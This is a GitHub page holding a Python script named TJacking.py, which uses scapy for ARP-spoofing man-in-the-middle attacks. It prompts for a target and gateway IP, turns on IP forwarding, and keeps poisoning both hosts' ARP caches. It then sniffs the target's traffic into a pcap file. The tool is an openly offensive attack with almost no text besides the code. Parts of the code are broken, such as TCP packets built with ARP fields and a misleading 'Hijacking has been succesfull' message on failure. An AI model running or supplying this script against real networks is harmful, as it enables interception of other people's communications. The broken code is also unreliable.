-
Notifications
You must be signed in to change notification settings - Fork 0
/
TJacking.py
108 lines (98 loc) · 3.83 KB
/
TJacking.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
#ARPSPOOFING2.0
#Author: GrayFox
#For team Cypher
#usr/env/python2
print ("""
$$$$$$$$\ $$$$$$\ $$$$$$$\ $$\ $$\
\__$$ __|$$ __$$\ $$ __$$\ $$ | $$ |
$$ | $$ / \__|$$ | $$ |$$ | $$ |
$$ | $$ | $$$$$$$ |$$$$$$$$ |
$$ | $$ | $$ ____/ $$ __$$ |
$$ | $$ | $$\ $$ | $$ | $$ |
$$ | \$$$$$$ |$$ | $$ | $$ |
\__| \______/ \__| \__| \__|
Made By GrayFox""")
#Importations
import sys, os, time
from scapy.all import *
import os
import signal
import sys
import threading
import time
#Showing the ARP protocols in your net
os.system ("netstat -tupn | grep EST")
os.system ("sleep 7")
target = raw_input("Chosse IP>>>")
tunnel = raw_input("chosse the tunnel>>>")
packet = raw_input("Chosse the number of packets to send>>>")
#TCP hijacking parameters
gateway_ip = tunnel
target_ip = target
packet_count = packet
conf.iface = "wlan0"
conf.verb = 0
#Given an IP, get the MAC. For Recieve the package
def get_mac(ip_address):
#ARP request is constructed. sr function is used to send/ receive a layer 3 packet
#Alternative Method using Layer 2: resp, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=ip_address))
resp, unans = sr(ARP(op=1, hwdst="ff:ff:ff:ff:ff:ff", pdst=ip_address), retry=2, timeout=10)
for s,r in resp:
return r[ARP].hwsrc
return None
#Crafting the packet and sending
#Threading start
def restore_network(gateway_ip, gateway_mac, target_ip, target_mac):
send(TCP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=target_mac, psrc=target_ip), count=5)
send(TCP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=5)
print("[*] Disabling IP forwarding")
#Disable IP Forwarding on a mac
os.system("sysctl -w net.inet.ip.forwarding=0")
#kill process on a mac
os.kill(os.getpid(), signal.SIGTERM)
#Keep sending false ARP replies to put our man in the middle to intercept packets
#This will use our interface MAC address as the hwsrc for the ARP reply
def arp_poison(gateway_ip, gateway_mac, target_ip, target_mac):
print("[*] Started TCP poison attack [CTRL-C to stop]")
try:
while True:
send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip))
send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip))
time.sleep(2)
except KeyboardInterrupt:
print("[*] Stopped TCP poison attack. Restoring network")
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
#Start the program
print("[*] Starting script: TJAcking.py")
print("[*] Enabling IP forwarding")
#Enable IP Forward on a MAC
os.system("sysctl -w net.inet.ip.forwarding=1")
print("[*] Gateway IP:"+tunnel)
print("[*] Target IP:"+target)
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print("[!] Unable to get gateway MAC address. Exiting..In the same way, Hijacking has been succesfull, open your sniffer ;)")
sys.exit(0)
else:
print("[*] Gateway MAC address:"+gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print("[!] Unable to get target MAC address. Exiting..")
sys.exit(0)
else:
print("[*] Target MAC address:"+target_mac)
#ARP poison thread
poison_thread = threading.Thread(target=arp_poison, args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
#Sniff traffic
try:
sniff_filter = "ip host " + target_ip
print("[*] Starting network capture")
packets = sniff(filter=sniff_filter, iface=conf.iface, count=packet_count)
wrpcap(target_ip + "_capture.pcap", packets)
print("[*] Stopping network capture..Restoring network")
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
print("[*] Stopping network capture..Restoring network")
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit(0)